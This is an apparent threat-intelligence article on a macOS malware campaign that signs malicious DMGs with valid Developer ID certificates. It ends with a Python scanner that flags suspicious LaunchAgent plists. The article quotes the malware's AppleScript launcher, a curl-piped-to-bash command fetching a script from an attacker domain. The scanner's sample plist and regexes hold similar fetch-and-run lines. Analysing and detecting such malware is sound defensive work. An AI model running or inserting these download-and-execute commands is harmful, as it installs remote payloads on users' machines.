In recent weeks, security analysts have observed a new wave of macOS attacks leveraging legitimately issued Extended Validation (EV) certificates to sign malicious disk images (DMGs).
This technique allows malware authors to evade detection by VirusTotal and built-in macOS security checks.
The campaign first surfaced when multiple samples appeared on threat intelligence feeds, each bearing a valid Developer ID Application signature.
Attackers are exploiting the high cost and stringent vetting of EV certificates to lend an air of legitimacy to otherwise malicious payloads.
Initial infections appear to be delivered via phishing lures, with compromised websites hosting the signed DMG installers masquerading as legitimate applications.
Security researcher @g0njxa noted that the abuse of EV certificates is not confined to Windows malware; it is increasingly present in macOS threats as well.
He identified a novel signed DMG, fully undetectable on VirusTotal, issued under the Developer ID “THOMAS BOULAY DUVAL (J97GLQ5KW9)”.
The sample (SHA256: a031ba8111ded0c11acfedea9ab83b4be8274584da71bcc88ff72e2d51957dd7) displays a bundle identifier mimicking the signer name (e.g., “thomas.parfums”), a poor attempt to camouflage within legitimate software distributions.
Once reported, these certificates are revoked, but not before they have enabled significant stealth in early campaign stages.
Despite the high financial and procedural barrier to obtaining Apple EV certificates, threat actors appear willing to invest in them, knowing that revocation may come too late to prevent initial compromise.
This underscores a growing trend: adversaries trading speed for legitimacy by leveraging established trust chains.
Infection Mechanism
The primary infection mechanism begins with a signed DMG that, when mounted, executes an embedded AppleScript launcher.
Examination of the Mach-O binary within the DMG reveals hardcoded references to a remote script host:
#!/usr/bin/osascript
do shell script "curl -sL https://franceparfumes[.]org/parfume/install.sh | bash"
Upon execution, the script downloads and executes an ARM64-compiled payload that establishes persistence by writing a LaunchAgent plist to ~/Library/LaunchAgents/com.thomas.parfums.agent.plist and relaunches itself at login.
This method bypasses Gatekeeper checks by relying on the valid EV signature and avoids triggering MRT scans, resulting in a fully undetectable installation flow.
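As an added example (not code from the article or from the researcher), a small Python check a defender can run over a user's LaunchAgents folder to flag plists matching the persistence pattern described above: program arguments that fetch a remote script and pipe it into a shell, or that run AppleScript's "do shell script", re-executed at login via RunAtLoad. The two sample plists and the install URL example.invalid are constructed for the demo; only the label com.thomas.parfums.agent comes from the article.

```python
import plistlib
import re
from pathlib import Path
from typing import Dict, List
from xml.parsers.expat import ExpatError

# Command-line shapes worth flagging in a LaunchAgent (defender heuristics).
REMOTE_FETCH_RE = re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba|z)?sh\b")
DO_SHELL_SCRIPT_RE = re.compile(r"do shell script", re.IGNORECASE)


def launch_agent_findings(plist_bytes: bytes) -> List[str]:
    """Return the reasons a LaunchAgent plist looks suspicious ([] if none)."""
    try:
        agent = plistlib.loads(plist_bytes)
    except (plistlib.InvalidFileException, ExpatError):
        return ["plist does not parse"]
    args = list(agent.get("ProgramArguments") or [])
    if isinstance(agent.get("Program"), str):  # launchd also accepts a bare Program key
        args.insert(0, agent["Program"])
    cmdline = " ".join(a for a in args if isinstance(a, str))
    findings = []
    if REMOTE_FETCH_RE.search(cmdline):
        findings.append("downloads a remote script and pipes it into a shell")
    if "osascript" in cmdline and DO_SHELL_SCRIPT_RE.search(cmdline):
        findings.append("runs AppleScript 'do shell script' from a LaunchAgent")
    if findings and agent.get("RunAtLoad"):
        findings.append("RunAtLoad is set: re-executes at every login")
    return findings


def scan_launch_agents(directory: str = "~/Library/LaunchAgents") -> Dict[str, List[str]]:
    """Map each *.plist in `directory` that triggered a finding to its findings."""
    results: Dict[str, List[str]] = {}
    for path in sorted(Path(directory).expanduser().glob("*.plist")):
        findings = launch_agent_findings(path.read_bytes())
        if findings:
            results[path.name] = findings
    return results


# Constructed samples: the label is the one quoted above, the URL is a placeholder.
SUSPICIOUS_PLIST = plistlib.dumps({
    "Label": "com.thomas.parfums.agent",
    "ProgramArguments": ["/usr/bin/osascript", "-e",
                         'do shell script "curl -sL https://example.invalid/install.sh | bash"'],
    "RunAtLoad": True,
})
BENIGN_PLIST = plistlib.dumps({"Label": "com.example.backup",
                               "ProgramArguments": ["/usr/local/bin/backup", "--quiet"]})
```

Calling scan_launch_agents() with no argument checks the current user's ~/Library/LaunchAgents; pass another directory (or /Library/LaunchAgents) to check system-wide agents.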